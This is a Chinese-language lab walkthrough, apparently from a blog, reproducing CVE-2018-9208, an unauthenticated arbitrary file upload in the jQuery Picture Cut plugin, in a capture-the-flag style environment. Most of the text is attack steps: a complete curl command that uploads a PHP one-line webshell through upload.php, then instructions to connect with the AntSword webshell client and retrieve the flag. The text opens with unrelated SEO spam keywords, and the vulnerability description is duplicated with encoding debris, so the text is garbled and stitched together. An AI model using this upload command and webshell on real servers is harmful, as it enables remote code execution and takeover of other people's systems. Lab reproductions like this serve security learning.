长沙市网站推广多少钱,品牌网站建设堅持大蝌蚪,网页设计心得体会100字,免费查找企业信息的网站jquery-picture-cut 任意文件上传_#xff08;CVE-2018-9208#xff09;
漏洞信息
jQuery Picture Cut v1.1以下版本中存在安全漏洞CVE-2018-9208文件上传漏洞
描述
picture cut是一个jquery插件#xff0c;以友好和简单的方式处理图像#xff0c;具有基于bootstrap…jquery-picture-cut 任意文件上传_CVE-2018-9208
漏洞信息
jQuery Picture Cut v1.1以下版本中存在安全漏洞CVE-2018-9208文件上传漏洞
描述
picture cut是一个jquery插件以友好和简单的方式处理图像具有基于bootstrap或jquery ui的漂亮界面具有ajax上传从资源管理器拖动图像图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器从而允许执行代码。
前提 volfucs靶场复现 可以进入后台
复现过程
访问首页 使用命令将一句话木马传上去目录为volfucs安装该靶场的位置
jquery-picture-cut/src/php/upload.phpcurl -F inputOfFilefile -F requestupload -F enableResize0 -F minimumWidthToResize0 -F minimumHeightToResize0 -F folderOnServer/ -F imageNameRandom1 -F maximumSize10000 -F enableMaximumSize0 -F fileyijuhua.php http://10.9.47.6:56174//jquery-picture-cut/src/php/upload.php使用中国蚁剑连接
http://10.9.47.6:56174/yijuhua.php获取flag
